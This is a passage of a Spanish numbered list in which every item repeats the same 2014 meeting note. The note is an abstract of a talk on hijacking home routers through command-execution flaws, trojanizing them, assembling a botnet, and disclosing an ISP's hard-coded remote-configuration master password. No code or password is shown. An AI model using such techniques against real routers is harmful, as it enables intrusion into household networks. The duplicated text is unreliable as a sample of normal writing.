asistentes.
  10. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  11. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  12. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  13. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  14. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  15. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  16. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  17. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  18. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  19. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  20. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  21. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  22. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  23. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  24. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  25. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  26. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  27. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  28. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  29. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  30. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  31. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  32. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  33. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  34. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  35. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  36. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  37. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  38. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  39. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  40. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
